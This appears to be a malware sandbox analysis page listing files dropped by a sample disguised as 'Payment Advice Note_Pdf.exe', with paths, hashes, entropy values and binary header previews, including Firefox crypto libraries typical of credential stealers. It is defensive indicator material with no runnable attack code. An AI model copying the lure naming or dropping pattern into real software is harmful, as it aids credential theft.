Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................\|..O........9...d...d.......\|..O........d...............\|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................\|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-math-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28984
Entropy (8bit):	6.6686462438397
Encrypted:	false
SSDEEP:	384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
MD5:	8B0BA750E7B15300482CE6C961A932F0
SHA1:	71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
SHA-256:	BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
SHA-512:	FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-multibyte-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26424
Entropy (8bit):	6.712286643697659
Encrypted:	false
SSDEEP:	384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V
MD5:	35FC66BD813D0F126883E695664E7B83
SHA1:	2FD63C18CC5DC4DEFC7EA82F421050E668F68548
SHA-256:	66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
SHA-512:	65F8397DE5C48D3DF8AD79BAF46C1D3A0761F727E918AE63612EA37D96ADF16CC76D70D454A599F37F9BA9B4E2E38EBC845DF4C74FC1E1131720FD0DCB881431
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u'............!.....$...................@...............................P............@.............................. ...........@...............*..8=..............T............................................................................text....".......$.................. ..`.rsrc........@.......&..............@..@v....................u'.........<...d...d........u'.........d................u'.....................RSDS7.%..5..+...+.....api-ms-win-crt-multibyte-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg........ ...edata...@..`....rsrc$01....`@.......rsrc$02.....................u'.....................8...X...x...;...`.......................1...T...w...................'...L...q.......................B...e.......................7...Z...}...................+...L...m.......................

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-private-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73016
Entropy (8bit):	5.838702055399663
Encrypted:	false
SSDEEP:	1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj
MD5:	9910A1BFDC41C5B39F6AF37F0A22AACD
SHA1:	47FA76778556F34A5E7910C816C78835109E4050
SHA-256:	65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
SHA-512:	A9788D0F8B3F61235EF4740724B4A0D8C0D3CF51F851C367CC9779AB07F208864A7F1B4A44255E0DE8E030D84B63B1BDB58F12C8C20455FF6A55EF6207B31A91
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....^1...........!................................................................R.....@.............................................................8=..............T............................................................................text............................... ..`.rsrc...............................@..@v.....................^1........:...d...d.........^1........d.................^1....................RSDS.J..w/.8..bu..3.....api-ms-win-crt-private-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata......`....rsrc$01....`........rsrc$02......................^1.....>..............8...h#...5...>...?..7?.._?...?...?...?...@..V@...@...@...@..+A..\A...A...A...A...B..LB...B...B...C..HC...C...C...C...C...D..HD...D...D...E..eE...E...E...F..1F..gF...F...F...G..BG..uG...G..

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-process-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.076072254895036
Encrypted:	false
SSDEEP:	192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
MD5:	8D02DD4C29BD490E672D271700511371
SHA1:	F3035A756E2E963764912C6B432E74615AE07011
SHA-256:	C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
SHA-512:	D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-runtime-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22840
Entropy (8bit):	6.942029615075195
Encrypted:	false
SSDEEP:	384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
MD5:	41A348F9BEDC8681FB30FA78E45EDB24
SHA1:	66E76C0574A549F293323DD6F863A8A5B54F3F9B
SHA-256:	C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
SHA-512:	8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-stdio-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24368
Entropy (8bit):	6.873960147000383
Encrypted:	false
SSDEEP:	384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
MD5:	FEFB98394CB9EF4368DA798DEAB00E21
SHA1:	316D86926B558C9F3F6133739C1A8477B9E60740
SHA-256:	B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
SHA-512:	57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-string-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23488
Entropy (8bit):	6.840671293766487
Encrypted:	false
SSDEEP:	384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
MD5:	404604CD100A1E60DFDAF6ECF5BA14C0
SHA1:	58469835AB4B916927B3CABF54AEE4F380FF6748
SHA-256:	73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
SHA-512:	DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-time-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20792
Entropy (8bit):	7.018061005886957
Encrypted:	false
SSDEEP:	384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
MD5:	849F2C3EBF1FCBA33D16153692D5810F
SHA1:	1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
SHA-256:	69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
SHA-512:	44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-utility-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.127951145819804
Encrypted:	false
SSDEEP:	192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
MD5:	B52A0CA52C9C207874639B62B6082242
SHA1:	6FB845D6A82102FF74BD35F42A2844D8C450413B
SHA-256:	A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
SHA-512:	18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...\|.......................

C:\Users\user\AppData\Local\Temp\DFE8CB31\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	332752
Entropy (8bit):	6.8061257098244905
Encrypted:	false
SSDEEP:	6144:C+YBCxpjbRIDmvby5xDXlFVJM8PojGGHrIr1qqDL6XP+jW:Cu4Abg7XV72GI/qn6z
MD5:	343AA83574577727AABE537DCCFDEAFC
SHA1:	9CE3B9A182429C0DBA9821E2E72D3AB46F5D0A06
SHA-256:	393AE7F06FE6CD19EA6D57A93DD0ACD839EE39BA386CF1CA774C4C59A3BFEBD8
SHA-512:	827425D98BA491CD30929BEE6D658FCF537776CE96288180FE670FA6320C64177A7214FF4884AE3AA68E135070F28CA228AFB7F4012B724014BA7D106B5F0DCE
Malicious:	false
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L......Z.........."!.........f...............................................p......o.....@.............................P...`........@..p....................P..........T...........................8...@...............8............................text...U........................... ..`.rdata..............................@..@.data...lH..........................@....rsrc...p....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DFE8CB31\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	139216
Entropy (8bit):	6.841477908153926
Encrypted:	false
SSDEEP:	3072:8Oqe98Ea4usvd5jm6V0InXx/CHzGYC6NccMmxK3atIYHD2JJJsPyimY4kQkE:Vqe98Evua5Sm0ux/5YC6NccMmtXHD2JR
MD5:	9E682F1EB98A9D41468FC3E50F907635
SHA1:	85E0CECA36F657DDF6547AA0744F0855A27527EE
SHA-256:	830533BB569594EC2F7C07896B90225006B90A9AF108F49D6FB6BEBD02428B2D
SHA-512:	230230722D61AC1089FABF3F2DECFA04F9296498F8E2A2A49B1527797DCA67B5A11AB8656F04087ACADF873FA8976400D57C77C404EBA4AFF89D92B9986F32ED
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."yQ.f.?Mf.?Mf.?Mo`.Mv.?M.z>Lb.?M...Md.?M.z<Lh.?M.z;Lm.?M.z:Lu.?MDx>Lo.?Mf.>M..?M.{1Lu.?M.{?Lg.?M.{.Mg.?M.{=Lg.?MRichf.?M................PE..L......Z.........."!.........................................................@............@.............................\...L...,.... ..p....................0......p...T...............................@...................T...@....................text............................... ..`.rdata...b.......d..................@..@.data...............................@....rsrc...p.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DFE8CB31\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DFE8CB31\nss3.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1244112
Entropy (8bit):	6.809431682312062
Encrypted:	false
SSDEEP:	24576:XDI7I4/FeoJQuQ3IhXtHfjyqgJ0BnPQAib7/12bg2JSna5xfg0867U4MSpu731hn:uQ3YX5jyqgynPkbd24VwMSpu7Fhn
MD5:	556EA09421A0F74D31C4C0A89A70DC23
SHA1:	F739BA9B548EE64B13EB434A3130406D23F836E3
SHA-256:	F0E6210D4A0D48C7908D8D1C270449C91EB4523E312A61256833BFEAF699ABFB
SHA-512:	2481FC80DFFA8922569552C3C3EBAEF8D0341B80427447A14B291EC39EA62AB9C05A75E85EEF5EA7F857488CAB1463C18586F9B076E2958C5A314E459045EDE2
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........x..c+..c+..c+...+..c++.b..c+lh.+..c++.`..c++.f..c++.g..c+.b..c+9.b..c+..b+..c+9.k..c+9.gC.c+9.c..c+9..+..c+9.a..c+Rich..c+................PE..L...a..Z.........."!................T........................................@............@.............................d....<..T.......h.......................t~..0...T...............................@............................................text............................... ..`.rdata...P.......R..................@..@.data....E...`... ...:..............@....rsrc...h............Z..............@..@.reloc..t~...........^..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DFE8CB31\nssdbm3.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	92624
Entropy (8bit):	6.639368309935547
Encrypted:	false
SSDEEP:	1536:5vNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41ZH:hNGVOiBZbcGmxXMcBqmzoCUZoZebHZMw
MD5:	569A7A65658A46F9412BDFA04F86E2B2
SHA1:	44CC0038E891AE73C43B61A71A46C97F98B1030D
SHA-256:	541A293C450E609810279F121A5E9DFA4E924D52E8B0C6C543512B5026EFE7EC
SHA-512:	C027B9D06C627026774195D3EAB72BD245EBBF5521CB769A4205E989B07CB4687993A47061FF6343E6EC1C059C3EC19664B52ED3A1100E6A78CFFB1C46472AFB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L......Z.........."!.........0...............0............................................@..........................?.......@.......`..p............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..4....0... ..................@..@.data........P.......>..............@....rsrc...p....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DFE8CB31\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144336
Entropy (8bit):	6.5527585854849395
Encrypted:	false
SSDEEP:	3072:zAf6suip+z7FEk/oJz69sFaXeu9CoT2nIZvetBWqIBoE9Mv:Q6PpsF4CoT2EeY2eMv
MD5:	67827DB2380B5848166A411BAE9F0632
SHA1:	F68F1096C5A3F7B90824AA0F7B9DA372228363FF
SHA-256:	9A7F11C212D61856DFC494DE111911B7A6D9D5E9795B0B70BBBC998896F068AE
SHA-512:	910E15FD39B48CD13427526FDB702135A7164E1748A7EACCD6716BCB64B978FE333AC26FA8EBA73ED33BD32F2330D5C343FCD3F0FE2FFD7DF54DB89052DB7148
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L......Z.........."!.........`...............................................P......+Z....@..........................................0..p....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...C.......D..................@..@.data........ ......................@....rsrc...p....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DFE8CB31\ucrtbase.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142072
Entropy (8bit):	6.809041027525523
Encrypted:	false
SSDEEP:	24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
MD5:	D6326267AE77655F312D2287903DB4D3
SHA1:	1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
SHA-256:	0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
SHA-512:	11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DFE8CB31\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.655335921632966
Encrypted:	false
SSDEEP:	192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
MD5:	EE260C45E97B62A5E42F17460D406068
SHA1:	DF35F6300A03C4D3D3BD69752574426296B78695
SHA-256:	E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
SHA-512:	A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\toenailed\quoteworthy\Atoning\Kisaeng.Nus

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	210622
Entropy (8bit):	7.390602118855331
Encrypted:	false
SSDEEP:	3072:DpngmzGsHzrJu9oYE+SKNwJuj48IcaQR6caPvWU89jQamxDJoaX3q9pz:D5nzDHz9rYE+BNwJnca9LvWXKdouQ
MD5:	CDB31DE31A163C5607563DDBED31AC85
SHA1:	5F65184106DE397FEFC060F5BEEFAFB628C75E50
SHA-256:	C7B3693DA43012D4AC7C15D69339412DD216C2CF937894A1CBA868F5D9B53EB4
SHA-512:	2040E05B33BC1A758A7F5BFC685A4775FEEE7E5782CE3D44349193B3F3D5C6CB831CE0C9B307F0A5A4FA55F96D755B49DCD8462E3CD2B3495D2B3CD09C1A7AF0
Malicious:	false
Preview:	.rr........{........}}.....................yy..777.........ggggg.cccc..].....o.}}}.......{.t............^.=............{{{{.....w.......`...[.222..m....G..............ggggg.PP....................pp.........F.....!..................0.........4....................5................\|......K......y...........ff.@.........6......................hhh.................(((.X...............++....{.................$........::....... ................y..............\|\|...........................\|.....u.....m..........:::.0....ss.....;;........Y.................--...)..........ss.oo.`......j........Z..............@@...K.......................}..........6.....,,.........n...tt............................u......--...........88888... .j...........T.R...))..........zzz......*..............'''.....q....CC......((((.((.b.((...&&..........;.;;;...............aa.......\|\|.XX.N...M....Q..LLLL...........d.........&............CC.e....!!...T....III..........6......V.....................................

C:\Users\user\toenailed\quoteworthy\Atoning\Skiftevis.sys

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	11220
Entropy (8bit):	4.517565979254667
Encrypted:	false
SSDEEP:	192:ip4u0RnBO2E3+qssxgJ4OAtd36h3Virv8r+8wEtIjKWO:ip4uCY2pqslZqd36FViT8S8wEtZWO
MD5:	92F9B58E6FD124AB36C2AF80A69B4E7E
SHA1:	5F2E9648EB80A2DBC58447A86B7ED334E17C1DD3
SHA-256:	130EB015CEE52D5469445711AF937FD74BDC582B5C22A73BED6D525308B4868F
SHA-512:	6A31A3340C36D06793965D13AFE97BE93A1B254020E660AC98644A767B2CF7974EA042F981C1E9E7710E31DB53FCFC73247986F01EAC8C4112915627C03A7F50
Malicious:	true
